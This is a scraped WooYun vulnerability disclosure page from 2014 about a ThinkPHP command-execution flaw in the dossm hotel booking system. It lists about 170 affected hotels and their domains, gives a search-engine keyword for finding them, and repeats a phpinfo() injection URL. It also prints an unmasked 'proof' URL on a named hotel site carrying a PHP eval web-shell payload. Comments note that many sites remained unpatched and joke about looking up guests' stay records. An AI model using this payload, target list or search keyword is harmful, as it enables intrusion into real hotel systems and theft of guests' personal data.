一个漏洞沦陷至少全国各地170家酒店及酒店集团（可查开房信息，国庆你还开房吗）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-077249

漏洞标题：一个漏洞沦陷至少全国各地170家酒店及酒店集团（可查开房信息，国庆你还开房吗）

漏洞作者：北京方便面

提交时间：2014-09-25 10:03

修复时间：2014-12-24 10:04

公开时间：2014-12-24 10:04

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-09-25：细节已通知厂商并且等待厂商处理中
2014-09-28：厂商已经确认，细节仅向厂商公开
2014-10-01：细节向第三方安全合作伙伴开放
2014-11-22：细节向核心白帽子及相关领域专家公开
2014-12-02：细节向普通白帽子公开
2014-12-12：细节向实习白帽子公开
2014-12-24：细节向公众公开

简要描述：

一个漏洞沦陷至少170家酒店及酒店集团（可查开房信息，国庆你还开房吗）
御庭酒店集团、钓鱼台、BARONY、欧亚酒店集团、彩虹会、REGALIA、悦华国际、通程国际酒店管理有限公司等
当然，不仅仅这几家，数量至少90家酒店及酒店集团，包含全国各地酒店。

详细说明：

全都是使用dossm系统该系统基于thinkphp开发存在命令执行漏洞
案例：http://www.wintour.cn/case.html
广州问途信息技术有限公司
谷歌的一个关键字

6到30个字符,不可含 inurl:register.html

这并不是全部
影响酒店列表（包括但不限于）：

涉及的酒店名单：
UC Berkeley - Graduate School of Education
University at Buffalo Department of Physics
三亚iHome海景度假公馆
中信·博鳌千舟湾度假公寓
文轩苑
三亚牧海
东海大厦
帝豪酒店
旅行在线
神州会通
英德仙湖
西苑饭店
远洋宾馆
阳光酒店
阳朔酒店
阳光酒店- 深圳  
东莞迎宾馆
天福源酒店
广东迎宾馆
三亚天域酒店
东莞帝豪酒店
天域度假酒店
帝豪酒店集团
广州建国酒店
广州建国饭店
广州远洋宾馆
广州阳光酒店
广晟旅业集团
御庭酒店集团
成都阳光酒店
桂山华星酒店
深圳阳光酒店
远洋集团酒店
鲜花满屋客栈
深圳阳光酒店  
三亚宝宏大酒店
三亚石溪墅酒店
三亚祈年高尔夫
华雅国际大酒店
南通市文峰饭店
天域长白山酒店
广东裕通大酒店
广州地中海国际
广州木莲庄酒店
庐山北斗星酒店
张家界阳光酒店
深圳求水山酒店
珠海德翰大酒店
珠海海湾大酒店
苏州冠云大酒店
远广州远洋宾馆
长沙金源大酒店
阳朔懒人堂客栈
龙源温泉大酒店
三亚丽景海湾酒店
三亚海韵度假酒店
三亚牧海主题酒店
三亚珠江花园酒店
东莞帝豪花园酒店
东莞欧亚国际酒店
乐清市金鼎大酒店
云浮凯旋国际酒店
亚龙湾高尔夫球会
北京昆泰嘉华酒店
厦门建发旅游集团
四会岭南东方酒店
广东华师粤海酒店
广州华金盾大酒店
广州科尔海悦酒店
广州逸林假日酒店
广州香雪国际酒店
成都天府阳光酒店
桂林鲜花满屋酒店
欧亚国际酒店集团
武汉中南花园饭店
河南天地粤海酒店
海南亚泰温泉酒店
美丽之冠管理集团
首旅建国酒店管理
上海久阳滨江酒店  
东莞帝豪花园酒店  
广东华师粤海酒店  
广州花样年华酒店  
成都天府阳光酒店  
玉海国际度假酒店  
美丽之冠管理集团  
北京应物会议中心(花园路店)
万年县红万年大酒店
三亚中亚国际大酒店
三亚天福源度假酒店
三亚金棕榈度假酒店
常州九洲环宇大酒店
广东亚洲国际大酒店
广州地中海国际酒店
海口黄金海景大酒店
深圳宝利来国际大酒
重庆仙女山华邦酒店
阳朔小清迈精品酒店
三亚金棕榈度假酒店 
重庆仙女山华邦酒店 
三亚亚龙湾高尔夫球会
三亚柏瑞精品海景酒店
三亚湘投银泰度假酒店
君廷酒店及度假村集团
四川成都天府阳光酒店
张家界禾田居度假酒店
深圳宝利来国际大酒店
琼海天福源温泉大酒店
蓝色海湾海景度假公寓
三亚柏瑞精品海景酒店  
三亚湘投银泰度假酒店  
三亚半山半岛帆船港酒店
三亚海蓝蓝海景度假公寓
五指山亚泰雨林度假酒店
广州嘉鸿华美达广场酒店
琼海天福源温泉度假酒店
三亚凤凰水城凯莱度假酒店
东莞市常平逸豪国际大酒店
惠州德泽园（粤海）假日大酒店

mask 区域

1.://**.**.**//www.aihotel.com/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
2.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
3.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
4.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
5.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
6.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
7.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
8.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
9.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
10.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
11.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
12.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
13.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
14.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
15.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
16.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
17.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
18.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
19.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
20.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
21.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
22.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
23.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
24.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
25.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
26.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
27.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
28.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
29.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
30.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
31.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
32.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
33.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
34.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
35.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
36.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
37.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
38.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
39.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
40.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
41.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
42.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
43.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
44.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
45.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
46.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
47.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
48.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
49.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
50.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
51.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
52.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
53.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
54.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
55.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
56.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
57.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
58.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
59.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
60.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
*****0 处^*****
61.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
62.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
63.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
64.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
65.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
66.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
67.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
68.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
69.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
70.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
71.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
72.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
73.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
74.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
75.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
76.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
77.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
78.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
79.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
80.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
81.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
82.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
83.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
84.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
85.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
86.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
87.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
88.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
89.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
90.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
91.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
92.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
93.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
94.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
95.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
96.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
97.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
98.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
99.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D</code>

aihotel.com
baohonghotel.com
baolilai-hotel.com
bmgcn.com
chinameetings.cn
cnicc.com
dehan.test.dossm.com
devpaytmpl3v15.test.dossm.com
dgdh.test.dossm.com
dggarden.royalhotels.cn
dgrhm.group.dossm.com
dzhgz.com
easelandhotel.com
electron.physics.buffalo.edu
fhschotel.com
guangzhougdhhotel.com
gzdhhotel.test.dossm.com
horizon.com.cn
horizonsanya.com
hotelsjianguo.com
hotelxianjianguo.com
huangdao.lanhai.cn
huangshan.baronyhotels.com
huaponthotel.com
hy.yingwu.com.cn
hzdzyhotel.test.dossm.com
jianguohotelgz.com
laoshan.lanhai.cn
licheng.lanhai.cn
lxol.com.cn
m.xiyuanhotel.com.cn
m.yfkxhotel.com
mail.resortintime.com
oceanhotel.coscohotels.com
osresort.cn
ouyahotels.com
prgardenhotel.com.cn
qh.tianfuyuan.com
qh.wap.tianfuyuan.com
qianmenhotel.com
resortgp.com
resortintime.com
rmhgz.cn
royalgardenhotel.com.cn
royalmarinaplaza.com
sanya31.com
sanyaliking.com
sci-apartment.com
shizhong.lanhai.cn
sunshinehotel.com
sunshinehotelzjj.com
sxs.resortgp.com
sy.tianfuyuan.com
sy.wap.tianfuyuan.com
szjingdu.com
test.cndhotels.com
test.yeohwahotels.com
tfsunshinehotel.com
tfyg.test.dossm.com
tokaihotel.coscohotels.com
vaya-hotel.cn
wakingtown-hotel.com
wap.skyland-hotel.com
wap.soluxehotel.com
whoyhz.test.dossm.com
wintour.cn
www-gse.berkeley.edu
www.3496666.com
www.aihotel.com
www.baohonghotel.com
www.baolilai-hotel.com
www.baronyhotels.com
www.bllhotel.com
www.bmgcn.com
www.chinameetings.cn
www.cnicc.com
www.colorfuldays-hotel.com
www.coscohotels.cn
www.coscohotels.com
www.coscohotels.com.cn
www.dgeahotel.com
www.dgybhotel.com
www.dzhgz.com
www.dzyhotel.com
www.easelandhotel.com
www.ebdh-hotel.com
www.eco-hotel.com.cn
www.eversunshinehotel.com
www.fcghotel.com
www.fhschotel.com
www.gbvh.com
www.gdhhotels.com
www.gdyutonghotel.com
www.glamorhotel.com
www.goldenhotel.com.cn
www.goldsourcehotel.com
www.guangzhougdhhotel.com
www.guishanhotel.com
www.hainanyataihotel.com
www.harmonahotel.com
www.hebs.asia
www.horizon.com.cn
www.horizoncbs.com
www.horizonsanya.com
www.hotelsjianguo.com
www.huaponthotel.com
www.hwndjd.com
www.jadesea.cn
www.jbstel.com
www.jianguohotelgz.com
www.jianliharmonyhotel.com
www.jindinghotel.cn
www.joyahotel.cn
www.joyahotel.com
www.kuntairoyalhotel.com
www.lndfhotel-sh.com
www.lphotel.cn
www.lyhotspring.com
www.muhaihotel.com
www.oceanhotel.com.cn
www.osresort.cn
www.ouyahotels.com
www.physics.buffalo.edu
www.pinweijiudian.com
www.prgardenhotel.com.cn
www.qianzhouwan.com
www.qsshotel.com
www.ramadaplazagz.com
www.regalia.com.cn
www.resortgp.com
www.resortintime.com
www.rhgresorts.com
www.risinghotel.com
www.royalgardenhotel.com.cn
www.royalhotels.cn
www.royalmarinaplaza.com
www.sanya31.com
www.sanyabarry.com
www.sanyaliking.com
www.sevenraygolf.com
www.shangrilaassociation.org
www.singwood.com.cn
www.soluxehotel.com
www.soluxehotelgz.com
www.sunshinehotel.com
www.sunshinehotels.cn
www.sunshinehotelzjj.com
www.szjingdu.com
www.tfsunshinehotel.com
www.themulian.com
www.tianfuyuan.com
www.vaya-hotel.cn
www.wakingtown-hotel.com
www.wenfenghotel.com
www.wintour.cn
www.wmjh.cn
www.wuzhishanyatai.com
www.wx-hotel.com
www.xianhuamanwu.com
www.xiaoqingmai.com
www.xn--sjqu43axxn38f.com
www.xsfd.com
www.yalongbaygolfclub.com
www.yangshuoholiday.com
www.yfkxhotel.com
www.yhihotel.com
www.yingbinhotel.cn
www.ysdidu.com
www.znhyfd.cn
www.zzghhotel.com
xitangjiudian.com
xiushan.baronyhotels.com
yalongbaygolfclub.com
ysdidu.com
zhaolonghotel.com.cn

http://be.btghotels.com/

mask 区域

*****/param1/$%7B*****

http://be.btghotels.com/

mask 区域

*****1/$%7B@print(ev*****

漏洞证明：

涉及的酒店太多了数据库如下：

通用
http://www.sanya31.com/saas/index.php/module/action/param1/$%7B@print(eval($_POST[c]))%7D

修复方案：

版权声明：转载请注明来源北京方便面@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：17

确认时间：2014-09-28 11:40

厂商回复：

漏洞评价：

2014-09-25 10:04 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

反正住不起酒店
2014-09-25 10:05 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老，学到老!)

没开过房，你查我呀你查我呀~
2014-09-25 10:05 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在，梦在)

洞主，你这是为了查男票开房记录么？
2014-09-25 10:07 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上！！！)

以后开房就不要身份证了
2014-09-25 10:08 | Sem ( 路人 | Rank:0 漏洞数:2 | 　)

0.0
2014-09-25 10:10 | ze0r ( 路人 | Rank:0 漏洞数:1 | ..)

@带馅儿馒头首先你得确认LZ是女的，，，当然我不希望是男的。。。
2014-09-25 10:17 | 小卖部部长 ( 路人 | Rank:24 漏洞数:3 | 别拿部长不当干部！)

我家开旅馆的，洞主小心下次你来开房的时候，我把你的TT扎破~~~哈哈。
2014-09-25 10:19 | zeracker ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

代查小三？小四？说得好像洞主都不开房似的....
2014-09-25 10:24 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

这个漏洞影响这么大，竟然没加精，给通用奖金！
2014-09-25 10:26 | Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产；如遇接单收徒、绝非本人所...)

与某期众测有关？
2014-09-25 10:35 | 浩天 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

又到了考察人品的时候，哈哈
2014-09-25 10:39 | niliu ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

我凑哦
2014-09-25 10:39 | 风花雪月 ( 实习白帽子 | Rank:55 漏洞数:44 | []+[]|[]-[][][][][]%[][]|[]\[]%[][]|[]\[...)

我想说以后打死我不开房了，前几天住宾馆住的要死了！！
2014-09-25 10:52 | 吴友仁 ( 路人 | Rank:20 漏洞数:3 | 不要问我叫什么名字，请叫我雷锋)

又要多一些离婚的人们了
2014-09-25 11:00 | Finger ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗，任何自称Finger并...)

变了上百了... 据洞主说还不止这些...
2014-09-25 11:04 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

不是90家啊又多了
2014-09-25 11:07 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生，这几个月忙着把屎把尿...忒...)

不错
2014-09-25 11:13 | 爱Gail ( 普通白帽子 | Rank:237 漏洞数:38 | 爱漏洞、爱编程、爱旅游、爱Gail)

还好，哥开房的五星级没被泄露
2014-09-25 11:15 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

打雷了，这个会不会上ccav
2014-09-25 11:17 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨，淡看江湖路...)

去公园
2014-09-25 11:22 | 爱上平顶山 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

目测是昨晚的那个的通用~
2014-09-25 11:27 | Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产；如遇接单收徒、绝非本人所...)

@爱上平顶山 Bingo~
2014-09-25 11:28 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)

北京方便面，你又来了...
2014-09-25 11:31 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

从没开过房的人路过。
2014-09-25 11:34 | 浩天 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

说的就好像你们都开过房似的
2014-09-25 11:39 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖，不如相濡以沫)

昨天的众测
2014-09-25 12:03 | 0749orz ( 路人 | Rank:3 漏洞数:4 | 厌了，烦了~~~)

反正住不起酒店
2014-09-25 12:10 | 小川 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

知道众测命令执行是谁了
2014-09-25 12:36 | ziwen ( 实习白帽子 | Rank:49 漏洞数:4 | 活着为了乐还是为了苦？)

mk
2014-09-25 12:44 | 小胖子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

不好意思，我喜欢野战！
2014-09-25 12:46 | 天地不仁以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁万物为刍狗)

没前排了 CCAV这里这里
2014-09-25 12:49 | p4ssw0rd ( 普通白帽子 | Rank:306 漏洞数:92 | 不作死就不会死)

攒钱买放吧...
2014-09-25 12:56 | zzzmode ( 路人 | Rank:7 漏洞数:2 | )

反正住不起酒店...
2014-09-25 13:17 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博：http://weibo.com/J1n9999)

不好意思，我喜欢野战！
2014-09-25 13:24 | GuoKer（ZhuLiu） ( 普通白帽子 | Rank:168 漏洞数:21 | 在校学生党的路过霸气侧漏)

不好意思，我喜欢野战！
2014-09-25 13:55 | ′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

开。
2014-09-25 14:10 | 白非白 ( 普通白帽子 | Rank:447 漏洞数:60 | ♫ Freedom - Anthony Hamilton ♫)

命令执行，难道就是那个cve？
2014-09-25 14:14 | s0mun5 ( 普通白帽子 | Rank:493 漏洞数:24 | .)

最后知道真相的你们眼泪掉下来
2014-09-25 14:45 | Let a person cry. ( 路人 | Rank:23 漏洞数:9 | xxoo)

我喜欢车震，不好意思，
2014-09-25 15:07 | 飞天鼠 ( 路人 | Rank:0 漏洞数:1 | 努力学习)

这个要怎么才能求见，就各位大牛赐教
2014-09-25 15:31 | Yck ( 路人 | Rank:0 漏洞数:1 | 找个玩渗透网站的、教我玩渗透、我给他8位q...)

好屌！不过洒家喜欢野战。。。。
2014-09-25 15:52 | Walle ( 路人 | Rank:0 漏洞数:5 | ... 位卑、未敢忘忧国！ ...)

尼玛、又爆出了了、、
2014-09-25 16:50 | 晏子 ( 路人 | Rank:6 漏洞数:4 | 无)

天朝应该出几个驴友学校了。这样出去就不需要住宾馆了。
2014-09-25 16:51 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法？)

又可以查开房了
2014-09-25 16:54 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者，关注web安全。)

CCAV 拍这里！！
2014-09-25 17:11 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

开房数据还是隐私数据么？都野战来的~
2014-09-25 17:21 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井，架工，木工，电工，水暖工，力...)

求链接地址！！
2014-09-25 17:26 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习，求带飞~~~~~~~~~~~~~~~~~~~~~~...)

留名，mark
2014-09-25 17:30 | 无名指7年 ( 路人 | Rank:15 漏洞数:4 | 努力学习奋斗，争取成为一名合格的白帽子。)

火钳刘明
2014-09-25 17:58 | 好人 ( 路人 | Rank:13 漏洞数:6 | 多少人曾爱慕你年轻的容颜)

记者看这里茄子
2014-09-25 18:24 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚，关注互联网安全)

NB!
2014-09-25 19:22 | 梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

国庆你还吃方便面吗
2014-09-25 20:48 | 小乐天 ( 实习白帽子 | Rank:64 漏洞数:14 | From KnownSec)

反正国庆加班
2014-09-25 21:38 | CplusHua ( 普通白帽子 | Rank:238 漏洞数:33 | 乌云奖金:-1)

实名就是好~！
2014-09-25 21:44 | HUC缘生 ( 路人 | Rank:28 漏洞数:29 | 小白求罩~~~~)

求忽略~~~
2014-09-25 22:38 | 马化腾 ( 路人 | Rank:14 漏洞数:2 | 动词大呲咚呲哒呲)

说的就好像你们都开过房似的
2014-09-25 22:39 | 某个路人 ( 路人 | Rank:16 漏洞数:6 | python)

反正屌丝开不起房，你查呀
2014-09-26 11:01 | →Ｈack涛 ( 普通白帽子 | Rank:158 漏洞数:55 | 好好学习，天天向上！)

这个年代还要开房，真实out了
2014-09-26 11:13 | 兔兔侠 ( 路人 | Rank:2 漏洞数:1 )

前排上CCTV
2014-09-28 04:37 | 校长 ( 实习白帽子 | Rank:40 漏洞数:10 | 本人受《中华人民共和国未成年人保护法》《...)

CCAV我在这
2014-10-18 12:39 | ′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

都没修复把都还能成功。。
2014-10-18 12:48 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云，知恩不忘，其实我一直都在乌云默...)

@′ 雨。 @北京方便面不打码，裤子就要被黑产脱了怎么办？
2014-10-20 10:37 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

草了，纠结
2014-10-29 10:06 | depycode ( 普通白帽子 | Rank:275 漏洞数:44 | 关注网络安全，提高技术！)

好多没修复，裤子太多了。。。
2014-10-29 11:24 | gerfalke ( 路人 | Rank:14 漏洞数:4 | IT屌丝一枚)

所有链接基本是同服
2014-10-29 15:05 | 小卖部部长 ( 路人 | Rank:24 漏洞数:3 | 别拿部长不当干部！)

哎呀，终于看到正文了，楼主SO屌~~
2014-10-30 11:26 | 爱Gail ( 普通白帽子 | Rank:237 漏洞数:38 | 爱漏洞、爱编程、爱旅游、爱Gail)

都是测试数据
2014-12-24 11:19 | V-King ( 实习白帽子 | Rank:31 漏洞数:7 | 我是静静)

哎呀，终于看到正文了，楼主SO屌~~
2014-12-24 12:23 | 萌萌哒-花粉 ( 路人 | Rank:4 漏洞数:5 | 多乌云多美女花粉顾名思义就是校花班花...)

学习了可以去查前男（女）友了
2014-12-24 12:26 | 滔哥 ( 路人 | Rank:0 漏洞数:2 | 平常心！)

我了个去！！！
2014-12-27 01:14 | 你大爷在此百无禁忌 ( 路人 | Rank:10 漏洞数:6 | Hello 各位小伙伴们大家好我是王尼玛)

卧槽躲过了上一波躲不过这一波了
2014-12-27 13:06 | 0749orz ( 路人 | Rank:3 漏洞数:4 | 厌了，烦了~~~)

卧槽躲过了上一波躲不过这一波了
2015-02-17 23:36 | Ebon_Wolf ( 实习白帽子 | Rank:48 漏洞数:24 | 您好，我似咣咚朲，需要服务吗？专业酱油工...)

@肉肉为什么给我的忽略了呢？不同的参数却被忽略有点意思
2015-02-21 11:50 | 肉肉 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技，肉肉在长亭科技，肉肉在长...)

@Ebon_Wolf 私信发我你的漏洞链接

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-077249

漏洞标题：一个漏洞沦陷至少全国各地170家酒店及酒店集团（可查开房信息，国庆你还开房吗）

相关厂商：cncert

漏洞作者：北京方便面

提交时间：2014-09-25 10:03

修复时间：2014-12-24 10:04

公开时间：2014-12-24 10:04

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源北京方便面@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-077249

漏洞标题：一个漏洞沦陷至少全国各地170家酒店及酒店集团（可查开房信息，国庆你还开房吗）

相关厂商：cncert

漏洞作者： 北京方便面

提交时间：2014-09-25 10:03

修复时间：2014-12-24 10:04

